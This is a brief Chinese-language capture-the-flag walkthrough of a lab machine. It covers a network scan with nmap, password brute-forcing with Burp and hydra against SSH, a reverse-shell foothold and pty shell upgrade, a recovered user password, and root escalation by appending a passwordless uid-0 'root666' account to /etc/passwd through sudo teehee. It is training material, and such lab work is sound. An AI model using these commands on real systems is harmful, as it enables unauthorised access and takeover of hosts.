ifconfig
查找主机IP
扫一波内网,探测下存活主机
nmap 192.168.61.0/24
打开显示的IP地址

burp爆破
用kali的/usr/share/john下的password.lst当字典,burp爆破


暗示我们可以吧命令改成我们想运行的命令,比如反弹shell


kali开启监听,获取到信息

反弹交互shell
python -c 'import pty;pty.spawn("/bin/sh")'
尝试进入到home目录,看到三个三件夹,应该是三个用户
pwd
cd /home
ls

查看jim,buckups里有old-passwords.bak文件,应该是密码文件
把密码保存为文件1

爆破密码
- hydra -l jim -P 1 -t 10 ssh://192.168.61.132
- 或
- hydra -l jim -P 1 192.168.61.132 ssh

然后连接密码
ssh jim@192.168.61.132

表示有邮件


Charles(之前三个人名中出现过)
然后还给了密码:^xHhA&hvim0y
登录了Charles

提权
sudo -l


- sudo teehee -a /etc/passwd
- root666::0:0::/bin/bash
然后ctrl+c保存
cat /etc/passwd

写入成功
切换root666用户
su root666

然后cat flag.txt就行了
